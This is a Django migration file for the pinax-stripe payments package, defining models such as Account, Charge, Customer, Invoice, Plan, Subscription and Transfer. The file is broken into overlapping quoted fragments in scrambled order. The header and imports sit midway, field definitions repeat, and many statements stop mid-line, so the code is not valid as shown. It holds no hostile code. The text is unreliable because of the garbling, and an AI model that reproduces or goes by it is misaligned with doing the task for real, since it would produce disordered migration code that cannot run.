('description',", "pinax.stripe.models class Migration(migrations.Migration): initial = True dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ] operations =", "fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('account_balance', models.DecimalField(blank=True,", "fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('account', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='user_accounts', related_query_name='user_account', to='pinax_stripe.Account')), ('customer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE,", "to='pinax_stripe.Subscription'), ), migrations.AddField( model_name='customer', name='users', field=models.ManyToManyField(related_name='customers', related_query_name='customers', through='pinax_stripe.UserAccount', to=settings.AUTH_USER_MODEL), ), migrations.AddField( model_name='charge', name='customer',", "unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('business_name', models.TextField(blank=True, null=True)), ('business_url', models.TextField(blank=True, null=True)), ('charges_enabled', models.BooleanField(default=False)), ('country', models.CharField(max_length=2)),", "migrations.CreateModel( name='Event', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)),", "'abstract': False, }, ), migrations.CreateModel( name='BankAccount', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id',", "decimal import Decimal from django.conf import settings from django.db import 
migrations, models import", "max_digits=9)), ('currency', models.CharField(default='usd', max_length=10)), ('application', models.TextField(blank=True, null=True)), ('description', models.TextField(blank=True, null=True)), ('kind', models.CharField(max_length=150)), ('created_at',", "migrations.CreateModel( name='Charge', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)),", "max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount', models.DecimalField(decimal_places=2, max_digits=9)), ('amount_reversed', models.DecimalField(blank=True,", "), migrations.CreateModel( name='BankAccount', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at',", "('used_for_payment', models.BooleanField(default=False)), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='Card', fields=[ ('id', models.CharField(editable=False,", "models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('business_name', models.TextField(blank=True, null=True)), ('business_url',", "max_digits=9)), ('currency', models.CharField(max_length=15)), ('interval', models.CharField(max_length=15)), ('interval_count', models.IntegerField()), ('name', models.CharField(max_length=150)), ('statement_descriptor', models.TextField(blank=True)), ('trial_period_days', models.IntegerField(blank=True,", "models.DateTimeField(default=django.utils.timezone.now)), ('event', models.ForeignKey(blank=True, 
null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Event')), ], options={ 'abstract': False, }, ), migrations.CreateModel(", "max_length=25)), ('date', models.DateTimeField()), ('description', models.TextField(blank=True, null=True)), ('destination', models.TextField(blank=True, null=True)), ('destination_payment', models.TextField(blank=True, null=True)), ('failure_code',", "models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('description', models.TextField(blank=True)), ('paid', models.NullBooleanField()), ('disputed', models.NullBooleanField()), ('refunded', models.NullBooleanField()), ('captured',", "null=True)), ('stripe_account', models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Account')), ('user', models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)), ],", "False, }, ), migrations.CreateModel( name='Subscription', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191,", "models.DateTimeField(blank=True, null=True)), ('charge', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='invoices', to='pinax_stripe.Charge')), ('customer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='invoices', to='pinax_stripe.Customer')), ],", "null=True)), ('description', models.TextField(blank=True, null=True)), ('kind', models.CharField(max_length=150)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('transfer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='charge_fee_details', to='pinax_stripe.Transfer')), ],", "models.TextField(blank=True, null=True)), ('event', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='transfers', 
to='pinax_stripe.Event')), ('stripe_account', models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.CASCADE,", "# -*- coding: utf-8 -*- # Generated by Django 1.11.8 on 2018-08-06 19:00", "('trial_period_days', models.IntegerField(blank=True, null=True)), ('metadata', jsonfield.fields.JSONField(blank=True, null=True)), ('stripe_account', models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Account')), ],", "], options={ 'abstract': False, }, bases=(pinax.stripe.models.StripeAccountFromCustomerMixin, models.Model), ), migrations.CreateModel( name='Transfer', fields=[ ('id', models.CharField(editable=False,", "to='pinax_stripe.Account')), ('user', models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)), ], options={ 'abstract': False, }, ), migrations.CreateModel(", "on_delete=django.db.models.deletion.CASCADE, related_name='transfers', to='pinax_stripe.Event')), ('stripe_account', models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Account')), ], options={ 'abstract': False,", "max_digits=9, null=True)), ('currency', models.CharField(default='usd', max_length=10)), ('duration', models.CharField(default='once', max_length=10)), ('duration_in_months', models.PositiveIntegerField(blank=True, null=True)), ('livemode', models.BooleanField(default=False)),", "models.CharField(default='once', max_length=10)), ('duration_in_months', models.PositiveIntegerField(blank=True, null=True)), ('livemode', models.BooleanField(default=False)), ('max_redemptions', models.PositiveIntegerField(blank=True, null=True)), ('metadata', jsonfield.fields.JSONField(blank=True, null=True)),", "models.TextField(blank=True, null=True)), ('payout_schedule_delay_days', models.PositiveSmallIntegerField(blank=True, null=True)), ('payout_schedule_interval', 
models.CharField(blank=True, choices=[('Manual', 'manual'), ('Daily', 'daily'), ('Weekly', 'weekly'),", "# Generated by Django 1.11.8 on 2018-08-06 19:00 from __future__ import unicode_literals from", "null=True)), ('source_type', models.TextField(blank=True, null=True)), ('statement_descriptor', models.TextField(blank=True, null=True)), ('status', models.CharField(max_length=25)), ('transfer_group', models.TextField(blank=True, null=True)), ('type',", "models.DateTimeField(blank=True, null=True)), ('currency', models.CharField(default='usd', max_length=25)), ('date', models.DateTimeField()), ('description', models.TextField(blank=True, null=True)), ('destination', models.TextField(blank=True, null=True)),", "('payout_schedule_delay_days', models.PositiveSmallIntegerField(blank=True, null=True)), ('payout_schedule_interval', models.CharField(blank=True, choices=[('Manual', 'manual'), ('Daily', 'daily'), ('Weekly', 'weekly'), ('Monthly', 'monthly')],", "('available', models.BooleanField(default=False)), ('available_on', models.DateTimeField(blank=True, null=True)), ('fee', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('fee_currency', models.CharField(blank=True, max_length=10,", "models.PositiveIntegerField(default=0)), ('api_version', models.CharField(blank=True, max_length=100)), ('customer', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer')), ('stripe_account', models.ForeignKey(blank=True, default=None, null=True,", "name='customer', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer'), ), migrations.AddField( model_name='bitcoinreceiver', name='customer', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer'), ), migrations.AlterUniqueTogether( name='useraccount', unique_together=set([('user',", "models.PositiveIntegerField(blank=True, null=True)), ('valid', 
models.BooleanField(default=False)), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='Customer', fields=[", "models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('application_fee', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('created', models.DateTimeField(blank=True, null=True)), ('currency',", "), migrations.CreateModel( name='Charge', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at',", "null=True)), ('legal_entity_verification_details', models.TextField(blank=True, null=True)), ('legal_entity_verification_details_code', models.TextField(blank=True, null=True)), ('legal_entity_verification_document', models.TextField(blank=True, null=True)), ('legal_entity_verification_status', models.TextField(blank=True, null=True)),", "model_name='charge', name='invoice', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='charges', to='pinax_stripe.Invoice'), ), migrations.AddField( model_name='card', name='customer', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer'),", "null=True)), ('times_redeemed', models.PositiveIntegerField(blank=True, null=True)), ('valid', models.BooleanField(default=False)), ], options={ 'abstract': False, }, ), migrations.CreateModel(", "null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer')), ('stripe_account', models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Account')), ], options={ 'abstract': False,", "migrations.CreateModel( name='Plan', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191)), ('created_at', 
models.DateTimeField(default=django.utils.timezone.now)), ('amount',", "unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount_off', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('currency', models.CharField(default='usd', max_length=10)), ('duration', models.CharField(default='once',", "), migrations.AddField( model_name='invoiceitem', name='plan', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Plan'), ), migrations.AddField( model_name='invoiceitem', name='subscription', field=models.ForeignKey(blank=True,", "fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('amount', models.DecimalField(decimal_places=2, max_digits=9)), ('currency', models.CharField(default='usd', max_length=10)), ('application',", "('Monthly', 'monthly')], max_length=7, null=True)), ('payout_schedule_monthly_anchor', models.PositiveSmallIntegerField(blank=True, null=True)), ('payout_schedule_weekly_anchor', models.TextField(blank=True, null=True)), ('payout_statement_descriptor', models.TextField(blank=True, null=True)),", "on 2018-08-06 19:00 from __future__ import unicode_literals from decimal import Decimal from django.conf", "unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount', models.DecimalField(decimal_places=2, max_digits=9)), ('amount_reversed', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('application_fee', models.DecimalField(blank=True,", "models.BooleanField(default=False)), ('default_source', models.TextField(blank=True)), ('date_purged', models.DateTimeField(blank=True, editable=False, null=True)), ('stripe_account', models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Account')),", "model_name='customer', name='users', 
field=models.ManyToManyField(related_name='customers', related_query_name='customers', through='pinax_stripe.UserAccount', to=settings.AUTH_USER_MODEL), ), migrations.AddField( model_name='charge', name='customer', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE,", "models.TextField()), ('default_for_currency', models.BooleanField(default=False)), ('fingerprint', models.TextField()), ('last4', models.CharField(max_length=4)), ('metadata', jsonfield.fields.JSONField(blank=True, null=True)), ('routing_number', models.TextField()), ('status',", "null=True)), ('stripe_account', models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Account')), ], options={ 'abstract': False, }, ),", "null=True)), ('legal_entity_verification_status', models.TextField(blank=True, null=True)), ('type', models.TextField(blank=True, null=True)), ('metadata', jsonfield.fields.JSONField(blank=True, null=True)), ('stripe_publishable_key', models.CharField(blank=True, max_length=100,", "model_name='invoiceitem', name='subscription', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Subscription'), ), migrations.AddField( model_name='invoice', name='subscription', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE,", "null=True)), ('legal_entity_address_line1', models.TextField(blank=True, null=True)), ('legal_entity_address_line2', models.TextField(blank=True, null=True)), ('legal_entity_address_postal_code', models.TextField(blank=True, null=True)), ('legal_entity_address_state', models.TextField(blank=True, null=True)),", "models.DateTimeField(default=django.utils.timezone.now)), ('account_balance', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('currency', models.CharField(blank=True, default='usd', max_length=10)), ('delinquent', 
models.BooleanField(default=False)), ('default_source',", "('legal_entity_maiden_name', models.TextField(blank=True, null=True)), ('legal_entity_personal_id_number_provided', models.BooleanField(default=False)), ('legal_entity_phone_number', models.TextField(blank=True, null=True)), ('legal_entity_ssn_last_4_provided', models.BooleanField(default=False)), ('legal_entity_type', models.TextField(blank=True, null=True)),", "unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('source', models.CharField(blank=True, max_length=100)), ('currency', models.CharField(default='usd', max_length=10)), ('amount', models.DecimalField(blank=True, decimal_places=2, max_digits=9,", "migrations.AddField( model_name='invoice', name='subscription', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Subscription'), ), migrations.AddField( model_name='customer', name='users', field=models.ManyToManyField(related_name='customers', related_query_name='customers',", "('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount_due', models.DecimalField(decimal_places=2, max_digits=9)), ('attempted', models.NullBooleanField()), ('attempt_count', models.PositiveIntegerField(blank=True, null=True)), ('statement_descriptor', models.TextField(blank=True)), ('currency',", "models.TextField()), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='Charge', fields=[ ('id', models.CharField(editable=False, max_length=32,", "models.TextField(blank=True)), ('currency', models.CharField(default='usd', max_length=10)), ('closed', models.BooleanField(default=False)), ('description', models.TextField(blank=True)), ('paid', models.BooleanField(default=False)), ('receipt_number', models.TextField(blank=True)), ('period_end',", "('amount', models.DecimalField(decimal_places=2, max_digits=9)), ('currency', models.CharField(max_length=15)), ('interval', 
models.CharField(max_length=15)), ('interval_count', models.IntegerField()), ('name', models.CharField(max_length=150)), ('statement_descriptor', models.TextField(blank=True)),", "models.TextField(blank=True, null=True)), ('destination_payment', models.TextField(blank=True, null=True)), ('failure_code', models.TextField(blank=True, null=True)), ('failure_message', models.TextField(blank=True, null=True)), ('livemode', models.BooleanField(default=False)),", "('statement_descriptor', models.TextField(blank=True, null=True)), ('status', models.CharField(max_length=25)), ('transfer_group', models.TextField(blank=True, null=True)), ('type', models.TextField(blank=True, null=True)), ('event', models.ForeignKey(blank=True,", "null=True)), ('redeem_by', models.DateTimeField(blank=True, null=True)), ('times_redeemed', models.PositiveIntegerField(blank=True, null=True)), ('valid', models.BooleanField(default=False)), ], options={ 'abstract': False,", "null=True)), ('legal_entity_last_name', models.TextField(blank=True, null=True)), ('legal_entity_maiden_name', models.TextField(blank=True, null=True)), ('legal_entity_personal_id_number_provided', models.BooleanField(default=False)), ('legal_entity_phone_number', models.TextField(blank=True, null=True)), ('legal_entity_ssn_last_4_provided',", "models.DateTimeField(default=django.utils.timezone.now)), ('transfer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='charge_fee_details', to='pinax_stripe.Transfer')), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='UserAccount',", "null=True)), ('payout_schedule_interval', models.CharField(blank=True, choices=[('Manual', 'manual'), ('Daily', 'daily'), ('Weekly', 'weekly'), ('Monthly', 'monthly')], max_length=7, null=True)),", "('total', models.DecimalField(decimal_places=2, max_digits=9)), ('date', models.DateTimeField()), ('webhooks_delivered_at', models.DateTimeField(blank=True, null=True)), ('charge', models.ForeignKey(blank=True, 
null=True, on_delete=django.db.models.deletion.CASCADE, related_name='invoices',", "null=True)), ('legal_entity_address_city', models.TextField(blank=True, null=True)), ('legal_entity_address_country', models.TextField(blank=True, null=True)), ('legal_entity_address_line1', models.TextField(blank=True, null=True)), ('legal_entity_address_line2', models.TextField(blank=True, null=True)),", "null=True)), ('legal_entity_address_state', models.TextField(blank=True, null=True)), ('legal_entity_dob', models.DateField(blank=True, null=True)), ('legal_entity_first_name', models.TextField(blank=True, null=True)), ('legal_entity_gender', models.TextField(blank=True, null=True)),", "models.TextField(blank=True, null=True)), ('statement_descriptor', models.TextField(blank=True, null=True)), ('status', models.CharField(max_length=25)), ('transfer_group', models.TextField(blank=True, null=True)), ('type', models.TextField(blank=True, null=True)),", "max_digits=9)), ('currency', models.CharField(default='usd', max_length=10)), ('kind', models.CharField(blank=True, max_length=25)), ('period_start', models.DateTimeField()), ('period_end', models.DateTimeField()), ('proration', models.BooleanField(default=False)),", "related_name='transfers', to='pinax_stripe.Event')), ('stripe_account', models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Account')), ], options={ 'abstract': False, },", "models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='bank_accounts', to='pinax_stripe.Account')), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='BitcoinReceiver', fields=[ ('id',", "models.BooleanField(default=False)), ('amount', models.DecimalField(decimal_places=2, max_digits=9)), ('amount_received', models.DecimalField(decimal_places=2, default=Decimal('0'), max_digits=9)), ('bitcoin_amount', models.PositiveIntegerField()), ('bitcoin_amount_received', 
models.PositiveIntegerField(default=0)), ('bitcoin_uri',", "), migrations.AddField( model_name='charge', name='invoice', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='charges', to='pinax_stripe.Invoice'), ), migrations.AddField( model_name='card', name='customer',", "models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='items', to='pinax_stripe.Invoice')), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='Plan', fields=[ ('id',", "), migrations.AddField( model_name='invoiceitem', name='subscription', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Subscription'), ), migrations.AddField( model_name='invoice', name='subscription', field=models.ForeignKey(blank=True,", "decimal_places=2, max_digits=9, null=True)), ('description', models.TextField(blank=True)), ('paid', models.NullBooleanField()), ('disputed', models.NullBooleanField()), ('refunded', models.NullBooleanField()), ('captured', models.NullBooleanField()),", "[ migrations.CreateModel( name='Account', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at',", "options={ 'abstract': False, }, ), migrations.CreateModel( name='Invoice', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)),", "}, ), migrations.CreateModel( name='Subscription', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)),", "operations = [ migrations.CreateModel( name='Account', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191,", "('percent_off', models.PositiveIntegerField(blank=True, null=True)), 
('redeem_by', models.DateTimeField(blank=True, null=True)), ('times_redeemed', models.PositiveIntegerField(blank=True, null=True)), ('valid', models.BooleanField(default=False)), ], options={", "('period_end', models.DateTimeField()), ('period_start', models.DateTimeField()), ('subtotal', models.DecimalField(decimal_places=2, max_digits=9)), ('tax', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('tax_percent',", "models.DateTimeField()), ('period_start', models.DateTimeField()), ('subtotal', models.DecimalField(decimal_places=2, max_digits=9)), ('tax', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('tax_percent', models.DecimalField(blank=True,", "-*- # Generated by Django 1.11.8 on 2018-08-06 19:00 from __future__ import unicode_literals", "models.CharField(blank=True, max_length=200)), ('quantity', models.IntegerField(blank=True, null=True)), ('invoice', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='items', to='pinax_stripe.Invoice')), ], options={ 'abstract': False,", "models.TextField(blank=True)), ('address_city', models.TextField(blank=True)), ('address_state', models.TextField(blank=True)), ('address_country', models.TextField(blank=True)), ('address_zip', models.TextField(blank=True)), ('address_zip_check', models.CharField(max_length=15)), ('brand', models.TextField(blank=True)),", "models.TextField(blank=True, null=True)), ('kind', models.CharField(max_length=150)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('transfer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='charge_fee_details', to='pinax_stripe.Transfer')), ], options={ 'abstract':", "}, ), migrations.CreateModel( name='UserAccount', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('account', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='user_accounts',", "import 
migrations, models import django.db.models.deletion import django.utils.timezone import jsonfield.fields import pinax.stripe.models class Migration(migrations.Migration):", "models.IntegerField()), ('name', models.CharField(max_length=150)), ('statement_descriptor', models.TextField(blank=True)), ('trial_period_days', models.IntegerField(blank=True, null=True)), ('metadata', jsonfield.fields.JSONField(blank=True, null=True)), ('stripe_account', models.ForeignKey(blank=True,", "19:00 from __future__ import unicode_literals from decimal import Decimal from django.conf import settings", "max_length=100)), ('currency', models.CharField(default='usd', max_length=10)), ('amount', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('amount_refunded', models.DecimalField(blank=True, decimal_places=2, max_digits=9,", "('payment', models.TextField(blank=True)), ('refund_address', models.TextField(blank=True)), ('uncaptured_funds', models.BooleanField(default=False)), ('used_for_payment', models.BooleanField(default=False)), ], options={ 'abstract': False, },", "null=True)), ('product_description', models.TextField(blank=True, null=True)), ('statement_descriptor', models.TextField(blank=True, null=True)), ('support_email', models.TextField(blank=True, null=True)), ('support_phone', models.TextField(blank=True, null=True)),", "primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('application_fee_percent', models.DecimalField(blank=True, decimal_places=2, default=None, max_digits=3, null=True)),", "models.TextField(blank=True, null=True)), ('legal_entity_gender', models.TextField(blank=True, null=True)), ('legal_entity_last_name', models.TextField(blank=True, null=True)), ('legal_entity_maiden_name', models.TextField(blank=True, null=True)), ('legal_entity_personal_id_number_provided', models.BooleanField(default=False)),", 
"models.TextField(blank=True, null=True)), ('legal_entity_last_name', models.TextField(blank=True, null=True)), ('legal_entity_maiden_name', models.TextField(blank=True, null=True)), ('legal_entity_personal_id_number_provided', models.BooleanField(default=False)), ('legal_entity_phone_number', models.TextField(blank=True, null=True)),", "('tokenization_method', models.CharField(blank=True, max_length=15)), ('exp_month', models.IntegerField()), ('exp_year', models.IntegerField()), ('funding', models.CharField(max_length=15)), ('last4', models.CharField(blank=True, max_length=4)), ('fingerprint',", "fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount_off', models.DecimalField(blank=True,", "('customer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='user_accounts', related_query_name='user_account', to='pinax_stripe.Customer')), ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='user_accounts', related_query_name='user_account', to=settings.AUTH_USER_MODEL)), ], ), migrations.AddField(", "models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('account_balance', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('currency', models.CharField(blank=True, default='usd', max_length=10)),", "('date', models.DateTimeField()), ('description', models.TextField(blank=True, null=True)), ('destination', models.TextField(blank=True, null=True)), ('destination_payment', models.TextField(blank=True, null=True)), ('failure_code', models.TextField(blank=True,", "options={ 'abstract': False, }, bases=(pinax.stripe.models.StripeAccountFromCustomerMixin, models.Model), ), migrations.CreateModel( name='InvoiceItem', fields=[ ('id', 
models.CharField(editable=False, max_length=32,", "('data', models.TextField()), ('message', models.CharField(max_length=500)), ('traceback', models.TextField()), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('event', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Event')),", "default=None, max_digits=3, null=True)), ('cancel_at_period_end', models.BooleanField(default=False)), ('canceled_at', models.DateTimeField(blank=True, null=True)), ('current_period_end', models.DateTimeField(blank=True, null=True)), ('current_period_start', models.DateTimeField(blank=True,", "models.TextField(blank=True, null=True)), ('legal_entity_verification_details', models.TextField(blank=True, null=True)), ('legal_entity_verification_details_code', models.TextField(blank=True, null=True)), ('legal_entity_verification_document', models.TextField(blank=True, null=True)), ('legal_entity_verification_status', models.TextField(blank=True,", "False, }, bases=(pinax.stripe.models.StripeAccountFromCustomerMixin, models.Model), ), migrations.CreateModel( name='InvoiceItem', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)),", "models.CharField(default='usd', max_length=25)), ('date', models.DateTimeField()), ('description', models.TextField(blank=True, null=True)), ('destination', models.TextField(blank=True, null=True)), ('destination_payment', models.TextField(blank=True, null=True)),", "to='pinax_stripe.Charge')), ('customer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='invoices', to='pinax_stripe.Customer')), ], options={ 'abstract': False, }, bases=(pinax.stripe.models.StripeAccountFromCustomerMixin, models.Model), ),", "null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Account')), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='TransferChargeFee', fields=[ ('id',", 
"('legal_entity_verification_status', models.TextField(blank=True, null=True)), ('type', models.TextField(blank=True, null=True)), ('metadata', jsonfield.fields.JSONField(blank=True, null=True)), ('stripe_publishable_key', models.CharField(blank=True, max_length=100, null=True)),", "models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=255)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount', models.DecimalField(decimal_places=2, max_digits=9)), ('currency', models.CharField(default='usd',", "('account', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='bank_accounts', to='pinax_stripe.Account')), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='BitcoinReceiver', fields=[", "models.CharField(blank=True, max_length=15)), ('exp_month', models.IntegerField()), ('exp_year', models.IntegerField()), ('funding', models.CharField(max_length=15)), ('last4', models.CharField(blank=True, max_length=4)), ('fingerprint', models.TextField()),", "null=True)), ('legal_entity_gender', models.TextField(blank=True, null=True)), ('legal_entity_last_name', models.TextField(blank=True, null=True)), ('legal_entity_maiden_name', models.TextField(blank=True, null=True)), ('legal_entity_personal_id_number_provided', models.BooleanField(default=False)), ('legal_entity_phone_number',", "migrations.CreateModel( name='Coupon', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)),", "max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount_due', models.DecimalField(decimal_places=2, max_digits=9)), ('attempted', 
models.NullBooleanField()),", "null=True)), ('statement_descriptor', models.TextField(blank=True)), ('currency', models.CharField(default='usd', max_length=10)), ('closed', models.BooleanField(default=False)), ('description', models.TextField(blank=True)), ('paid', models.BooleanField(default=False)), ('receipt_number',", "models.IntegerField(blank=True, null=True)), ('metadata', jsonfield.fields.JSONField(blank=True, null=True)), ('stripe_account', models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Account')), ], options={", "models.DateTimeField()), ('description', models.TextField(blank=True, null=True)), ('destination', models.TextField(blank=True, null=True)), ('destination_payment', models.TextField(blank=True, null=True)), ('failure_code', models.TextField(blank=True, null=True)),", "serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('source', models.CharField(blank=True, max_length=100)), ('currency', models.CharField(default='usd', max_length=10)), ('amount',", "serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount_due', models.DecimalField(decimal_places=2, max_digits=9)), ('attempted', models.NullBooleanField()), ('attempt_count', models.PositiveIntegerField(blank=True,", "('payout_schedule_weekly_anchor', models.TextField(blank=True, null=True)), ('payout_statement_descriptor', models.TextField(blank=True, null=True)), ('payouts_enabled', models.BooleanField(default=False)), ('verification_disabled_reason', models.TextField(blank=True, null=True)), ('verification_due_by', models.DateTimeField(blank=True,", "models.BooleanField(default=False)), ('country', models.CharField(max_length=2)), ('debit_negative_balances', models.BooleanField(default=False)), 
